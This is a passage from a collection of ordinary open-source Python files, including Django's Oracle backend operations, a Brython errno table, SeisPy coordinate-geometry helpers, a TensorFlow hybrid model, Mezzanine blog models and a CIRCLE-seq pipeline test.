# Oracle crashes with "ORA-03113: end-of-file on communication channel"
# if the time zone name is passed in parameter. Use interpolation instead.
# https://groups.google.com/forum/#!msg/django-developers/zwQju7hbG78/9l934yelwfsJ
# This regexp matches all time zone names from the zoneinfo database.
_tzname_re = re.compile(r'^[\w/:+-]+$')
def _convert_field_to_tz(self, field_name, tzname):
if not settings.USE_TZ:
return field_name
if not self._tzname_re.match(tzname):
raise ValueError("Invalid time zone name: %s" % tzname)
# Convert from UTC to local time, returning TIMESTAMP WITH TIME ZONE
# and cast it back to TIMESTAMP to strip the TIME ZONE details.
return "CAST((FROM_TZ(%s, '0:00') AT TIME ZONE '%s') AS TIMESTAMP)" % (field_name, tzname)
def datetime_cast_date_sql(self, field_name, tzname):
field_name = self._convert_field_to_tz(field_name, tzname)
sql = 'TRUNC(%s)' % field_name
return sql, []
def datetime_cast_time_sql(self, field_name, tzname):
# Since `TimeField` values are stored as TIMESTAMP where only the date
# part is ignored, convert the field to the specified timezone.
field_name = self._convert_field_to_tz(field_name, tzname)
return field_name, []
def datetime_extract_sql(self, lookup_type, field_name, tzname):
field_name = self._convert_field_to_tz(field_name, tzname)
sql = self.date_extract_sql(lookup_type, field_name)
return sql, []
def datetime_trunc_sql(self, lookup_type, field_name, tzname):
field_name = self._convert_field_to_tz(field_name, tzname)
# http://docs.oracle.com/cd/B19306_01/server.102/b14200/functions230.htm#i1002084
if lookup_type in ('year', 'month'):
sql = "TRUNC(%s, '%s')" % (field_name, lookup_type.upper())
elif lookup_type == 'day':
sql = "TRUNC(%s)" % field_name
elif lookup_type == 'hour':
sql = "TRUNC(%s, 'HH24')" % field_name
elif lookup_type == 'minute':
sql = "TRUNC(%s, 'MI')" % field_name
else:
sql = "CAST(%s AS DATE)" % field_name # Cast to DATE removes sub-second precision.
return sql, []
def time_trunc_sql(self, lookup_type, field_name):
# The implementation is similar to `datetime_trunc_sql` as both
# `DateTimeField` and `TimeField` are stored as TIMESTAMP where
# the date part of the later is ignored.
if lookup_type == 'hour':
sql = "TRUNC(%s, 'HH24')" % field_name
elif lookup_type == 'minute':
sql = "TRUNC(%s, 'MI')" % field_name
elif lookup_type == 'second':
sql = "CAST(%s AS DATE)" % field_name # Cast to DATE removes sub-second precision.
return sql
def get_db_converters(self, expression):
converters = super(DatabaseOperations, self).get_db_converters(expression)
internal_type = expression.output_field.get_internal_type()
if internal_type == 'TextField':
converters.append(self.convert_textfield_value)
elif internal_type == 'BinaryField':
converters.append(self.convert_binaryfield_value)
elif internal_type in ['BooleanField', 'NullBooleanField']:
converters.append(self.convert_booleanfield_value)
elif internal_type == 'DateTimeField':
converters.append(self.convert_datetimefield_value)
elif internal_type == 'DateField':
converters.append(self.convert_datefield_value)
elif internal_type == 'TimeField':
converters.append(self.convert_timefield_value)
elif internal_type == 'UUIDField':
converters.append(self.convert_uuidfield_value)
converters.append(self.convert_empty_values)
return converters
def convert_textfield_value(self, value, expression, connection, context):
if isinstance(value, Database.LOB):
value = force_text(value.read())
return value
def convert_binaryfield_value(self, value, expression, connection, context):
if isinstance(value, Database.LOB):
value = force_bytes(value.read())
return value
def convert_booleanfield_value(self, value, expression, connection, context):
if value in (0, 1):
value = bool(value)
return value
# cx_Oracle always returns datetime.datetime objects for
# DATE and TIMESTAMP columns, but Django wants to see a
# python datetime.date, .time, or .datetime.
def convert_datetimefield_value(self, value, expression, connection, context):
if value is not None:
if settings.USE_TZ:
value = timezone.make_aware(value, self.connection.timezone)
return value
def convert_datefield_value(self, value, expression, connection, context):
if isinstance(value, Database.Timestamp):
value = value.date()
return value
def convert_timefield_value(self, value, expression, connection, context):
if isinstance(value, Database.Timestamp):
value = value.time()
return value
def convert_uuidfield_value(self, value, expression, connection, context):
if value is not None:
value = uuid.UUID(value)
return value
def convert_empty_values(self, value, expression, connection, context):
# Oracle stores empty strings as null. We need to undo this in
# order to adhere to the Django convention of using the empty
# string instead of null, but only if the field accepts the
# empty string.
field = expression.output_field
if value is None and field.empty_strings_allowed:
value = ''
if field.get_internal_type() == 'BinaryField':
value = b''
return value
def deferrable_sql(self):
return " DEFERRABLE INITIALLY DEFERRED"
def fetch_returned_insert_id(self, cursor):
return int(cursor._insert_id_var.getvalue())
def field_cast_sql(self, db_type, internal_type):
if db_type and db_type.endswith('LOB'):
return "DBMS_LOB.SUBSTR(%s)"
else:
return "%s"
def last_executed_query(self, cursor, sql, params):
# https://cx-oracle.readthedocs.io/en/latest/cursor.html#Cursor.statement
# The DB API definition does not define this attribute.
statement = cursor.statement
if statement and six.PY2 and not isinstance(statement, unicode): # NOQA: unicode undefined on PY3
statement = statement.decode('utf-8')
# Unlike Psycopg's `query` and MySQLdb`'s `_last_executed`, CxOracle's
# `statement` doesn't contain the query parameters. refs #20010.
return super(DatabaseOperations, self).last_executed_query(cursor, statement, params)
def last_insert_id(self, cursor, table_name, pk_name):
sq_name = self._get_sequence_name(table_name)
cursor.execute('SELECT "%s".currval FROM dual' % sq_name)
return cursor.fetchone()[0]
def lookup_cast(self, lookup_type, internal_type=None):
if lookup_type in ('iexact', 'icontains', 'istartswith', 'iendswith'):
return "UPPER(%s)"
return "%s"
def max_in_list_size(self):
return 1000
def max_name_length(self):
return 30
def pk_default_value(self):
return "NULL"
def prep_for_iexact_query(self, x):
return x
def process_clob(self, value):
if value is None:
return ''
return force_text(value.read())
def quote_name(self, name):
# SQL92 requires delimited (quoted) names to be case-sensitive. When
# not quoted, Oracle has case-insensitive behavior for identifiers, but
# always defaults to uppercase.
# We simplify things by making Oracle identifiers always uppercase.
if not name.startswith('"') and not name.endswith('"'):
name = '"%s"' % truncate_name(name.upper(), self.max_name_length())
# Oracle puts the query text into a (query % args) construct, so % signs
# in names need to be escaped. The '%%' will be collapsed back to '%' at
# that stage so we aren't really making the name longer here.
name = name.replace('%', '%%')
return name.upper()
def random_function_sql(self):
return "DBMS_RANDOM.RANDOM"
def regex_lookup(self, lookup_type):
if lookup_type == 'regex':
match_option = "'c'"
else:
match_option = "'i'"
return 'REGEXP_LIKE(%%s, %%s, %s)' % match_option
def return_insert_id(self):
return "RETURNING %s INTO %%s", (InsertIdVar(),)
def savepoint_create_sql(self, sid):
return convert_unicode("SAVEPOINT " + self.quote_name(sid))
def savepoint_rollback_sql(self, sid):
return convert_unicode("ROLLBACK TO SAVEPOINT " + self.quote_name(sid))
def sql_flush(self, style, tables, sequences, allow_cascade=False):
# Return a list of 'TRUNCATE x;', 'TRUNCATE y;',
# 'TRUNCATE z;'... style SQL statements
if tables:
# Oracle does support TRUNCATE, but it seems to get us into
# FK referential trouble, whereas DELETE FROM table works.
sql = ['%s %s %s;' % (
style.SQL_KEYWORD('DELETE'),
style.SQL_KEYWORD('FROM'),
style.SQL_FIELD(self.quote_name(table))
) for table in tables]
# Since we've just deleted all the rows, running our sequence
# ALTER code will reset the sequence to 0.
sql.extend(self.sequence_reset_by_name_sql(style, sequences))
return sql
else:
return []
def sequence_reset_by_name_sql(self, style, sequences):
sql = []
for sequence_info in sequences:
sequence_name = self._get_sequence_name(sequence_info['table'])
table_name = self.quote_name(sequence_info['table'])
column_name = self.quote_name(sequence_info['column'] or 'id')
query = self._sequence_reset_sql % {
'sequence': sequence_name,
'table': table_name,
'column': column_name,
}
sql.append(query)
return sql
def sequence_reset_sql(self, style, model_list):
from django.db import models
output = []
query = self._sequence_reset_sql
for model in model_list:
for f in model._meta.local_fields:
if isinstance(f, models.AutoField):
table_name = self.quote_name(model._meta.db_table)
sequence_name = self._get_sequence_name(model._meta.db_table)
column_name = self.quote_name(f.column)
output.append(query % {'sequence': sequence_name,
'table': table_name,
'column': column_name})
# Only one AutoField is allowed per model, so don't
# continue to loop
break
for f in model._meta.many_to_many:
if not f.remote_field.through:
table_name = self.quote_name(f.m2m_db_table())
sequence_name = self._get_sequence_name(f.m2m_db_table())
column_name = self.quote_name('id')
output.append(query % {'sequence': sequence_name,
'table': table_name,
'column': column_name})
return output
def start_transaction_sql(self):
return ''
def tablespace_sql(self, tablespace, inline=False):
if inline:
return "USING INDEX TABLESPACE %s" % self.quote_name(tablespace)
else:
return "TABLESPACE %s" % self.quote_name(tablespace)
def adapt_datefield_value(self, value):
"""
Transform a date value to an object compatible with what is expected
by the backend driver for date columns.
The default implementation transforms the date to text, but that is not
necessary for Oracle.
"""
return value
def adapt_datetimefield_value(self, value):
"""
Transform a datetime value to an object compatible with what is expected
by the backend driver for datetime columns.
If naive datetime is passed assumes that is in UTC. Normally Django
models.DateTimeField makes sure that if USE_TZ is True passed datetime
is timezone aware.
"""
if value is None:
return None
# cx_Oracle doesn't support tz-aware datetimes
if timezone.is_aware(value):
if settings.USE_TZ:
value = timezone.make_naive(value, self.connection.timezone)
else:
raise ValueError("Oracle backend does not support timezone-aware datetimes when USE_TZ is False.")
return Oracle_datetime.from_datetime(value)
def adapt_timefield_value(self, value):
if value is None:
return None
if isinstance(value, six.string_types):
return datetime.datetime.strptime(value, '%H:%M:%S')
# Oracle doesn't support tz-aware times
if timezone.is_aware(value):
raise ValueError("Oracle backend does not support timezone-aware times.")
return Oracle_datetime(1900, 1, 1, value.hour, value.minute,
value.second, value.microsecond)
def combine_expression(self, connector, sub_expressions):
"Oracle requires special cases for %% and & operators in query expressions"
if connector == '%%':
return 'MOD(%s)' % ','.join(sub_expressions)
elif connector == '&':
return 'BITAND(%s)' % ','.join(sub_expressions)
elif connector == '|':
raise NotImplementedError("Bit-wise or is not supported in Oracle.")
elif connector == '^':
return 'POWER(%s)' % ','.join(sub_expressions)
return super(DatabaseOperations, self).combine_expression(connector, sub_expressions)
def _get_sequence_name(self, table):
name_length = self.max_name_length() - 3
return '%s_SQ' % truncate_name(table, name_length).upper()
def _get_trigger_name(self, table):
name_length = self.max_name_length() - 3
return '%s_TR' % truncate_name(table, name_length).upper()
def bulk_insert_sql(self, fields, placeholder_rows):
return " UNION ALL ".join(
"SELECT %s FROM DUAL" % ", ".join(row)
for row in placeholder_rows
)
def subtract_temporals(self, internal_type, lhs, rhs):
if internal_type == 'DateField':
lhs_sql, lhs_params = lhs
rhs_sql, rhs_params = rhs
return "NUMTODSINTERVAL(%s - %s, 'DAY')" % (lhs_sql, rhs_sql), lhs_params + rhs_params
return super(DatabaseOperations, self).subtract_temporals(internal_type, lhs, rhs)
|
40123148/w17b
|
refs/heads/master
|
static/Brython3.1.1-20150328-091302/Lib/errno.py
|
624
|
"""
This module makes available standard errno system symbols.
The value of each symbol is the corresponding integer value,
e.g., on most systems, errno.ENOENT equals the integer 2.
The dictionary errno.errorcode maps numeric codes to symbol names,
e.g., errno.errorcode[2] could be the string 'ENOENT'.
Symbols that are not relevant to the underlying system are not defined.
To map error codes to error messages, use the function os.strerror(),
e.g. os.strerror(2) could return 'No such file or directory'.
"""
errorcode= {1: 'EPERM', 2: 'ENOENT', 3: 'ESRCH', 4: 'EINTR', 5: 'EIO',
6: 'ENXIO', 7: 'E2BIG', 8: 'ENOEXEC', 9: 'EBADF', 10: 'ECHILD', 11: 'EAGAIN',
12: 'ENOMEM', 13: 'EACCES', 14: 'EFAULT', 15: 'ENOTBLK', 16: 'EBUSY',
17: 'EEXIST', 18: 'EXDEV', 19: 'ENODEV', 20: 'ENOTDIR', 21: 'EISDIR',
22: 'EINVAL', 23: 'ENFILE', 24: 'EMFILE', 25: 'ENOTTY', 26: 'ETXTBSY',
27: 'EFBIG', 28: 'ENOSPC', 29: 'ESPIPE', 30: 'EROFS', 31: 'EMLINK',
32: 'EPIPE', 33: 'EDOM', 34: 'ERANGE', 35: 'EDEADLOCK', 36: 'ENAMETOOLONG',
37: 'ENOLCK', 38: 'ENOSYS', 39: 'ENOTEMPTY', 40: 'ELOOP', 42: 'ENOMSG',
43: 'EIDRM', 44: 'ECHRNG', 45: 'EL2NSYNC', 46: 'EL3HLT', 47: 'EL3RST',
48: 'ELNRNG', 49: 'EUNATCH', 50: 'ENOCSI', 51: 'EL2HLT', 52: 'EBADE',
53: 'EBADR', 54: 'EXFULL', 55: 'ENOANO', 56: 'EBADRQC', 57: 'EBADSLT',
59: 'EBFONT', 60: 'ENOSTR', 61: 'ENODATA', 62: 'ETIME', 63: 'ENOSR',
64: 'ENONET', 65: 'ENOPKG', 66: 'EREMOTE', 67: 'ENOLINK', 68: 'EADV',
69: 'ESRMNT', 70: 'ECOMM', 71: 'EPROTO', 72: 'EMULTIHOP', 73: 'EDOTDOT',
74: 'EBADMSG', 75: 'EOVERFLOW', 76: 'ENOTUNIQ', 77: 'EBADFD', 78: 'EREMCHG',
79: 'ELIBACC', 80: 'ELIBBAD', 81: 'ELIBSCN', 82: 'ELIBMAX', 83: 'ELIBEXEC',
84: 'EILSEQ', 85: 'ERESTART', 86: 'ESTRPIPE', 87: 'EUSERS', 88: 'ENOTSOCK',
89: 'EDESTADDRREQ', 90: 'EMSGSIZE', 91: 'EPROTOTYPE', 92: 'ENOPROTOOPT',
93: 'EPROTONOSUPPORT', 94: 'ESOCKTNOSUPPORT', 95: 'ENOTSUP',
96: 'EPFNOSUPPORT', 97: 'EAFNOSUPPORT', 98: 'EADDRINUSE',
99: 'EADDRNOTAVAIL', 100: 'ENETDOWN', 101: 'ENETUNREACH', 102: 'ENETRESET',
103: 'ECONNABORTED', 104: 'ECONNRESET', 105: 'ENOBUFS', 106: 'EISCONN',
107: 'ENOTCONN', 108: 'ESHUTDOWN', 109: 'ETOOMANYREFS', 110: 'ETIMEDOUT',
111: 'ECONNREFUSED', 112: 'EHOSTDOWN', 113: 'EHOSTUNREACH', 114: 'EALREADY',
115: 'EINPROGRESS', 116: 'ESTALE', 117: 'EUCLEAN', 118: 'ENOTNAM',
119: 'ENAVAIL', 120: 'EISNAM', 121: 'EREMOTEIO', 122: 'EDQUOT',
123: 'ENOMEDIUM', 124: 'EMEDIUMTYPE', 125: 'ECANCELED', 126: 'ENOKEY',
127: 'EKEYEXPIRED', 128: 'EKEYREVOKED', 129: 'EKEYREJECTED',
130: 'EOWNERDEAD', 131: 'ENOTRECOVERABLE', 132: 'ERFKILL'}
EPERM=1
ENOENT=2
ESRCH=3
EINTR=4
EIO=5
ENXIO=6
E2BIG=7
ENOEXEC=8
EBADF=9
ECHILD=10
EAGAIN=11
ENOMEM=12
EACCES=13
EFAULT=14
ENOTBLK=15
EBUSY=16
EEXIST=17
EXDEV=18
ENODEV=19
ENOTDIR=20
EISDIR=21
EINVAL=22
ENFILE=23
EMFILE=24
ENOTTY=25
ETXTBSY=26
EFBIG=27
ENOSPC=28
ESPIPE=29
EROFS=30
EMLINK=31
EPIPE=32
EDOM=33
ERANGE=34
EDEADLOCK=35
ENAMETOOLONG=36
ENOLCK=37
ENOSYS=38
ENOTEMPTY=39
ELOOP=40
ENOMSG=42
EIDRM=43
ECHRNG=44
EL2NSYNC=45
EL3HLT=46
EL3RST=47
ELNRNG=48
EUNATCH=49
ENOCSI=50
EL2HLT=51
EBADE=52
EBADR=53
EXFULL=54
ENOANO=55
EBADRQC=56
EBADSLT=57
EBFONT=59
ENOSTR=60
ENODATA=61
ETIME=62
ENOSR=63
ENONET=64
ENOPKG=65
EREMOTE=66
ENOLINK=67
EADV=68
ESRMNT=69
ECOMM=70
EPROTO=71
EMULTIHOP=72
EDOTDOT=73
EBADMSG=74
EOVERFLOW=75
ENOTUNIQ=76
EBADFD=77
EREMCHG=78
ELIBACC=79
ELIBBAD=80
ELIBSCN=81
ELIBMAX=82
ELIBEXEC=83
EILSEQ=84
ERESTART=85
ESTRPIPE=86
EUSERS=87
ENOTSOCK=88
EDESTADDRREQ=89
EMSGSIZE=90
EPROTOTYPE=91
ENOPROTOOPT=92
EPROTONOSUPPORT=93
ESOCKTNOSUPPORT=94
ENOTSUP=95
EPFNOSUPPORT=96
EAFNOSUPPORT=97
EADDRINUSE=98
EADDRNOTAVAIL=99
ENETDOWN=100
ENETUNREACH=101
ENETRESET=102
ECONNABORTED=103
ECONNRESET=104
ENOBUFS=105
EISCONN=106
ENOTCONN=107
ESHUTDOWN=108
ETOOMANYREFS=109
ETIMEDOUT=110
ECONNREFUSED=111
EHOSTDOWN=112
EHOSTUNREACH=113
EALREADY=114
EINPROGRESS=115
ESTALE=116
EUCLEAN=117
ENOTNAM=118
ENAVAIL=119
EISNAM=120
EREMOTEIO=121
EDQUOT=122
ENOMEDIUM=123
EMEDIUMTYPE=124
ECANCELED=125
ENOKEY=126
EKEYEXPIRED=127
EKEYREVOKED=128
EKEYREJECTED=129
EOWNERDEAD=130
ENOTRECOVERABLE=131
ERFKILL=132
|
malcolmw/SeisPy
|
refs/heads/master
|
seispy/core/geometry.py
|
3
|
# coding=utf-8
"""
This module provides basic geometric utility functions to facilitate
working in different coordinate systems.
"""
from math import acos,\
atan2,\
cos,\
degrees,\
pi,\
radians,\
sin,\
sqrt
import numpy as np
from . import constants as _constants
EARTH_RADIUS = _constants.EARTH_RADIUS
def azimuth(lat1, lon1, lat2, lon2):
"""
Return the azimuth of the line connecting points **(lat1, lon1)**
and **(x2, y2)**.
:param float lat1: latitude coordinate of point 1
:param float lon1: longitude coordinate of point 1
:param float lat2: latitude coordinate of point 2
:param float lon2: longitude coordinate of point 2
:returns: azimuth of the line connecting points **(lat1, lon1)**
and **(lat2, lon2)** **{Units:** degrees, **Range:** [-180,
180)}.
:rtype: float
"""
return((90 - degrees(atan2(lat2 - lat1, lon2 - lon1))))
def azimuth2radians(azimuth):
"""
Convert azimuth value (measured clockwise from North in degrees) to
a value measured in radians counter-clockwise from East.
:param float azimuth: azimuth in degrees
:returns: equivalent of azimuth in radians
:rtype: float
"""
return(pi/2 - radians(azimuth))
def az2rad(azimuth):
"""
Convenience wrapper of :func:`azimuth2radians`.
"""
return(azimuth2radians(azimuth))
def coordinates(lat0, lon0, azimuth, distance):
"""
Return coordinates of point **distance** degrees from
(**lat0**, **lon0**) along **azimuth**.
:param float lat0: latitude of starting point
:param float lon0: longitude of starting point
:param float azimuth: azimuth of path to traverse **{Units:**
*Degrees*, **Range:** *(-inf, inf)*\ **}**
:param float distance: distance along path to traverse **{Units**:
*Degrees*\ **}**
:returns: geographic coordinates **distance** degrees from
(**lat0**, **lon0**) along **azimuth**
:rtype: (float, float)
:raises ValueError: if resulting coordinates are invalid
"""
phi = az2rad(azimuth)
dlat = sin(phi) * distance
dlon = cos(phi) * distance
lat, lon = lat0+dlat, lon0+dlon
validate_geographic_coords(lat, lon)
return(lat, lon)
def distance(u, v):
"""
Return the Euclidean distance between vectors **u** and **v**.
:param u: Vector 1.
:type u: list, tuple or other iterable
:param v: Vector 2.
:type v: list, tuple or other iterable
:returns: Euclidean distance between vectors **u** and **v**
:rtype: float
"""
if len(u) != len(v):
raise(ValueError("vectors u and v must have same length"))
u = np.asarray(u)
v = np.asarray(v)
return(sqrt(sum((u - v) ** 2)))
def get_line_endpoints(lat0, lon0, azimuth, length):
"""
Return the geographic coordinates (latitude, longitude) of a length=\
**length** line passing through coordinates **lat0** **lon0** with
strike=\ **strike**.
:param float lat0: latitude coordinate of line center {**Units**:
degrees, **Range**: [-90, 90]}
:param float lon0: longitude coordinate of line center {**Units**:
degrees, **Range**: [-180, 180]}
:param float azimuth: azimuth of line {**Units**: degrees,
**Range**: [-180, 180]}
:param float length: length of line **{Units:** *degrees*\ **}**
:returns: geographic coordinates of length=\ **length** line
passing through (**lat0**, **lon0**) with strike=
**strike**
:rtype: ((float, float), (float, float))
"""
phi = radians(azimuth)
l2 = 0.5 * length
theta1 = -phi + pi/2
theta2 = -phi - pi/2
return((lon0 + l2 * cos(theta2), lat0 + l2 * sin(theta2)),
(lon0 + l2 * cos(theta1), lat0 + l2 * sin(theta1)))
def geo2sph(coordinates):
"""
Convert geographic coordinates to spherical coordinates.
:param float lat: latitude coordinate {**Units**: degrees,
**Range**: [-90, 90]}
:param float lon: longitude coordinate {**Units**: degrees,
**Range**: [-180, 180]}
:param float depth: depth from surface {**Units**: km,
**Range**: (-inf, inf)}
:returns: spherical coordinate conversion *(r, theta, phi)* of
geographic coordinates
:rtype: (float, float, float)
"""
coordinates = np.asarray(coordinates)
if coordinates.shape == (3,):
lat, lon, z = validate_geographic_coords(coordinates)
theta = radians(90. - lat)
phi = radians(lon)
r = EARTH_RADIUS - z
return(r, theta, phi)
return(np.array([geo2sph(coords) for coords in coordinates]))
def radians2azimuth(theta):
"""
Convert value in radians measured counter-clockwise from East to
azimuth value measured in degrees clockwise from North.
:param float theta: value in radians measured clockwise from East
:returns: azimuth equivalent of **theta** measured in degrees
clockwise from North
:rtype: float
"""
return(degrees(pi/2 - theta))
def rad2az(theta):
"""
Convenience wrapper for :func:`radians2azimuth`.
"""
return(radians2azimuth(theta))
def sph2geo(r, theta, phi):
"""
Convert spherical coordinates to geographic coordinates.
:param float r: radial distance from coordinate system origin
{**Units**: km, **Range**: [0, inf)}
:param float theta: polar angle {**Units**: radians, **Range**: [0,
π]}
:param float phi: azimuthal angle {**Units**: radians, **Range**:
[-π, π]}
:returns: geographic coordinate conversion *(lat, lon, depth)* of
spherical coordinates
:rtype: (float, float, float)
"""
r, theta, phi = validate_spherical_coords([r, theta, phi])
z = EARTH_RADIUS - r
lat = 90 - degrees(theta)
lon = degrees(phi)
return(lat, lon, z)
def sph2xyz(r, theta, phi):
"""
Convert spherical coordinates to cartesian coordinates.
:param float r: radial distance from coordinate system origin
{**Units**: km, **Range**: [0, inf)}
:param float theta: polar angle {**Units**: radians, **Range**: [0,
π]}
:param float phi: azimuthal angle {**Units**: radians, **Range**:
[-π, π]}
:returns: cartesian coordinate conversion *(x, y, z)* of spherical
coordinates
:rtype: (float, float, float)
"""
r, theta, phi = validate_spherical_coords([r, theta, phi])
x = r * sin(theta) * cos(phi)
y = r * sin(theta) * sin(phi)
z = r * cos(theta)
return x, y, z
def xyz2sph(x, y, z):
"""
Convert cartesian coordinates to spherical coordinates.
:param float x: cartesian x-coordinate {**Units**: km, **Range**:
(-inf, inf)}
:param float y: cartesian y-coordinate {**Units**: km, **Range**:
(-inf, inf)}
:param float z: cartesian z-coordinate {**Units**: km, **Range**:
(-inf, inf)}
:returns: spherical coordinate conversion *(r, theta, phi)* of
cartesian coordinates
:rtype: (float, float, float)
"""
r = sqrt(x ** 2 + y ** 2 + z ** 2)
theta = acos(z / r)
phi = atan2(y, x)
return( r, theta, phi)
def rotation_matrix(axis, theta):
if axis == 1 or axis == 'x' or axis == 'X':
return np.array([[1, 0, 0],
[0, cos(theta), -sin(theta)],
[0, sin(theta), cos(theta)]])
elif axis == 2 or axis == 'y' or axis == 'Y':
return np.array([[cos(theta), 0, sin(theta)],
[0, 1, 0],
[-sin(theta), 0, cos(theta)]])
elif axis == 3 or axis == 'z' or axis == 'Z':
return np.array([[cos(theta), -sin(theta), 0],
[sin(theta), cos(theta), 0],
[0, 0, 1]])
else:
raise ValueError("invalid axis")
def validate_geographic_coords(coordinates):
data = np.asarray(coordinates)
if data.shape == (3,):
if not -90 <= data[0] <= 90:
raise(ValueError("latitude must be in range [-90, 90]: %f" % data[0]))
data[1] %= 360
data[1] = data[1] if data[1] < 180 else data[1] - 360
return(data)
return(np.asarray([validate_geographic_coords(coords) for coords in data]))
def validate_spherical_coords(coordinates):
data = np.asarray(coordinates)
if data.shape == (3,):
if data[0] < 0:
raise(ValueError("Invalid value for rho: {:f}".format(data[0])))
if np.pi < data[1] % (2 * np.pi) < np.pi * 2:
raise(ValueError("Invalid value for theta: {:f}".format(data[1])))
data[2] %= 2 * np.pi
data[2] = data[2] if 0 <= data[2] <= np.pi else data[2] - 2 * np.pi
return(data)
return(np.asarray([validate_spherical_coords(coords) for coords in data]))
def test():
coords = np.asarray([-90, 79, 3])
print(validate_geographic_coords(coords))
coords = np.asarray([[-89, -117, 3],[45, 426, 4]])
print(validate_geographic_coords(coords))
if __name__ == "__main__":
test()
|
Mistobaan/tensorflow
|
refs/heads/master
|
tensorflow/contrib/tensor_forest/hybrid/python/models/k_feature_decisions_to_data_then_nn.py
|
189
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A model that places a soft decision tree embedding before a neural net."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.tensor_forest.hybrid.python import hybrid_model
from tensorflow.contrib.tensor_forest.hybrid.python.layers import decisions_to_data
from tensorflow.contrib.tensor_forest.hybrid.python.layers import fully_connected
from tensorflow.python.training import adagrad
class KFeatureDecisionsToDataThenNN(hybrid_model.HybridModel):
"""A model that places a soft decision tree embedding before a neural net."""
def __init__(self,
params,
device_assigner=None,
optimizer_class=adagrad.AdagradOptimizer,
**kwargs):
super(KFeatureDecisionsToDataThenNN, self).__init__(
params,
device_assigner=device_assigner,
optimizer_class=optimizer_class,
**kwargs)
self.layers = [decisions_to_data.KFeatureDecisionsToDataLayer(
params, 0, device_assigner),
fully_connected.FullyConnectedLayer(
params, 1, device_assigner=device_assigner)]
|
Kniyl/mezzanine
|
refs/heads/master
|
mezzanine/blog/models.py
|
30
|
from __future__ import unicode_literals
from future.builtins import str
from django.db import models
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from mezzanine.conf import settings
from mezzanine.core.fields import FileField
from mezzanine.core.models import Displayable, Ownable, RichText, Slugged
from mezzanine.generic.fields import CommentsField, RatingField
from mezzanine.utils.models import AdminThumbMixin, upload_to
class BlogPost(Displayable, Ownable, RichText, AdminThumbMixin):
"""
A blog post.
"""
categories = models.ManyToManyField("BlogCategory",
verbose_name=_("Categories"),
blank=True, related_name="blogposts")
allow_comments = models.BooleanField(verbose_name=_("Allow comments"),
default=True)
comments = CommentsField(verbose_name=_("Comments"))
rating = RatingField(verbose_name=_("Rating"))
featured_image = FileField(verbose_name=_("Featured Image"),
upload_to=upload_to("blog.BlogPost.featured_image", "blog"),
format="Image", max_length=255, null=True, blank=True)
related_posts = models.ManyToManyField("self",
verbose_name=_("Related posts"), blank=True)
admin_thumb_field = "featured_image"
class Meta:
verbose_name = _("Blog post")
verbose_name_plural = _("Blog posts")
ordering = ("-publish_date",)
def get_absolute_url(self):
"""
URLs for blog posts can either be just their slug, or prefixed
with a portion of the post's publish date, controlled by the
setting ``BLOG_URLS_DATE_FORMAT``, which can contain the value
``year``, ``month``, or ``day``. Each of these maps to the name
of the corresponding urlpattern, and if defined, we loop through
each of these and build up the kwargs for the correct urlpattern.
The order which we loop through them is important, since the
order goes from least granualr (just year) to most granular
(year/month/day).
"""
url_name = "blog_post_detail"
kwargs = {"slug": self.slug}
date_parts = ("year", "month", "day")
if settings.BLOG_URLS_DATE_FORMAT in date_parts:
url_name = "blog_post_detail_%s" % settings.BLOG_URLS_DATE_FORMAT
for date_part in date_parts:
date_value = str(getattr(self.publish_date, date_part))
if len(date_value) == 1:
date_value = "0%s" % date_value
kwargs[date_part] = date_value
if date_part == settings.BLOG_URLS_DATE_FORMAT:
break
return reverse(url_name, kwargs=kwargs)
# These methods are deprecated wrappers for keyword and category
# access. They existed to support Django 1.3 with prefetch_related
# not existing, which was therefore manually implemented in the
# blog list views. All this is gone now, but the access methods
# still exist for older templates.
def category_list(self):
from warnings import warn
warn("blog_post.category_list in templates is deprecated"
"use blog_post.categories.all which are prefetched")
return getattr(self, "_categories", self.categories.all())
def keyword_list(self):
from warnings import warn
warn("blog_post.keyword_list in templates is deprecated"
"use the keywords_for template tag, as keywords are prefetched")
try:
return self._keywords
except AttributeError:
keywords = [k.keyword for k in self.keywords.all()]
setattr(self, "_keywords", keywords)
return self._keywords
class BlogCategory(Slugged):
"""
A category for grouping blog posts into a series.
"""
class Meta:
verbose_name = _("Blog Category")
verbose_name_plural = _("Blog Categories")
ordering = ("title",)
@models.permalink
def get_absolute_url(self):
return ("blog_post_list_category", (), {"category": self.slug})
|
tsailabSJ/circleseq
|
refs/heads/master
|
test/test_circleseq_merged.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_circleseq_merged
----------------------------------
Tests for `circleseq` module.
"""
import yaml
import unittest
import os
import shutil
import utils
from circleseq import circleseq
TEST_OUTPUT_PATH = 'tmp'
TEST_MANIFEST_PATH = os.path.join('CIRCLEseq_MergedTest.yaml')
CORRECT_ALIGNED_OUTPUT = 'data/MergedOutput/aligned'
CORRECT_IDENTIFIED_OUTPUT = 'data/MergedOutput/identified'
CORRECT_MERGED_OUTPUT = 'data/MergedOutput/merged'
CORRECT_VISUALIZATION_OUTPUT = 'data/MergedOutput/visualization'
CORRECT_ALL_OUTPUT = 'data/MergedOutput'
class FullPipelineTestCase(unittest.TestCase):
def setUp(self):
pass
def testFullPipeline(self):
c = circleseq.CircleSeq()
c.parseManifest(TEST_MANIFEST_PATH)
# Align and test the alignment output
c.alignReads()
self.assertTrue(utils.checkFolderEquality(os.path.join(c.analysis_folder, "aligned"), CORRECT_ALIGNED_OUTPUT))
# Find cleavage sites
c.findCleavageSites()
self.assertTrue(utils.checkFolderEquality(os.path.join(c.analysis_folder, 'identified'), CORRECT_IDENTIFIED_OUTPUT))
# Visualize filtered sites
c.visualize()
self.assertTrue(utils.checkFolderEquality(os.path.join(c.analysis_folder, 'visualization'), CORRECT_VISUALIZATION_OUTPUT))
def tearDown(self):
pass
if __name__ == '__main__':
unittest.main()
|
Qihoo360/zeppelin-gateway
|
refs/heads/master
|
tests/s3tests/functional/test_headers.py
|
2
|
from cStringIO import StringIO
import boto.connection
import boto.exception
import boto.s3.connection
import boto.s3.acl
